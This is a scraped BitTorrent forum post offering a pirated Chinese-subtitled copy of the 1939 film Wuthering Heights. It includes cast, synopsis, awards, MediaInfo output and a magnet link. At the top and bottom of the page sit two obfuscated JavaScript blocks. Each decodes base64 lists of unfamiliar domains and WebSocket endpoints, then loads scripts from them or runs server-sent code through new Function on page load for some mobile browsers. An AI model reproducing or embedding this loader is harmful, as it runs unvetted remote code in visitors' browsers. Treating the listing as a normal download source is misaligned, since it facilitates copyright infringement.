呼啸山庄[中文字幕].Wuthering.Heights.1939.1080p.FriDay.WEB-DL.H264.AAC 2.81GB

版主小s 1月前 216

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 呼啸山庄 / 魂归离恨天(港) / 咆哮山庄(台)

◎片 名 Wuthering Heights

◎年 代 1939

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 1939-04-07

◎IMDb链接 https://www.imdb.com/title/tt0032145/

◎豆瓣评分 7.8/10 (8761人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293647/

◎片 长 104 分钟

◎导 演 威廉·惠勒 William Wyler (id:1010691)

◎编 剧 本·赫克特 Ben Hecht (id:1032523)

查尔斯·麦克阿瑟 Charles MacArthur (id:1041623)

艾米莉·勃朗特 Emily Bront? (id:1027082)

◎演 员 梅尔·奥勃朗 Merle Oberon (id:1007108)

劳伦斯·奥利弗 Laurence Olivier (id:1053557)

大卫·尼文 David Niven (id:1032024)

格雷格·托兰德 Gregg Toland (id:1018544)

亚历山大·托卢博夫 Alexander Toluboff (id:1299362)

◎标 签 名著改编 / 爱情 / 经典 / 呼啸山庄 / 美国 / 美国电影 / 1939 / 名著

◎简 介

电影《呼啸山庄》改编自艾米莉·勃朗特同名小说。

此版在第12届奥斯卡奖评选中获得最佳摄影(黑白片)奖。

迪恩先生把一个叫希斯克利夫(劳伦斯·奥利弗 Laurence Olivier 饰)的吉普赛男孩带回呼啸山庄。女儿凯西(梅尔·奥勃朗 Merle Oberon 饰)爱上了他,但又不愿放弃优裕的生活。希斯克利夫得知后悄然离去,凯西则嫁给了邻居艾德加(大卫·尼文 David Niven 饰)。几年后希斯克利夫风度翩翩地回来了,买下了呼啸山庄。艾德加的妹妹伊贝拉爱上了他,他与伊莎贝拉结婚却对她冷淡无情。凯西也因为悲伤过度而濒临死亡。希斯克利夫心神错乱,在哀悼凯西、期待死亡中捱过了20年。他对周围一切人都极端轻蔑、百般折磨,直到凯西的幽灵在一个严冬的雪夜把他召唤到他们最喜爱的荒原上某个地方,在死亡中重新聚会……

◎获奖情况 (共8项)

第12届奥斯卡金像奖 (1940)

最佳影片(提名)

最佳导演(提名)

└──威廉·惠勒 (id:1010691)

最佳男主角(提名)

└──劳伦斯·奥利弗 (id:1053557)

最佳女配角(提名)

└──杰拉丁·菲茨杰拉德 (id:1036686)

最佳编剧(提名)

黑白片最佳摄影

└──格雷格·托兰德 (id:1018544)

最佳艺术指导(提名)

└──詹姆斯·巴斯维 (id:1020383)

最佳原创配乐(提名)

└──阿尔弗雷德·纽曼 (id:1032541)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 5606503985710769682856895418312338991 (0x437C5FCF2DD39BFEA16E17A6732AE2F)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.81 GiB

  8. Duration : 1 h 39 min

  9. Overall bit rate : 4 037 kb/s

  10. Encoded date : UTC 2021-10-23 13:55:27

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 39 min

  24. Bit rate mode : Constant

  25. Bit rate : 4 000 kb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 29.970 (30000/1001/53354) FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.064

  36. Stream size : 2.72 GiB (97%)

  37. Language : English

  38. Default : Yes

  39. Forced : No


  40. Audio

  41. ID : 2

  42. Format : AAC LC

  43. Format/Info : Advanced Audio Codec Low Complexity

  44. Codec ID : A_AAC-2

  45. Duration : 1 h 39 min

  46. Bit rate : 125 kb/s

  47. Channel(s) : 2 channels

  48. Channel layout : L R

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 46.875 FPS (1024 SPF)

  51. Compression mode : Lossy

  52. Stream size : 89.3 MiB (3%)

  53. Title : English

  54. Language : English

  55. Default : Yes

  56. Forced : No


  57. Text #1

  58. ID : 3

  59. Format : UTF-8

  60. Codec ID : S_TEXT/UTF8

  61. Codec ID/Info : UTF-8 Plain Text

  62. Duration : 1 h 38 min

  63. Bit rate : 60 b/s

  64. Count of elements : 1079

  65. Stream size : 44.0 KiB (0%)

  66. Title : Chinese Simplified

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : UTF-8

  73. Codec ID : S_TEXT/UTF8

  74. Codec ID/Info : UTF-8 Plain Text

  75. Duration : 1 h 38 min

  76. Bit rate : 60 b/s

  77. Count of elements : 1079

  78. Stream size : 44.0 KiB (0%)

  79. Title : Chinese Traditional

  80. Language : Chinese

  81. Default : No

  82. Forced : No




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:05AD41D3EAB6A319643D29023892F8218C458696

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};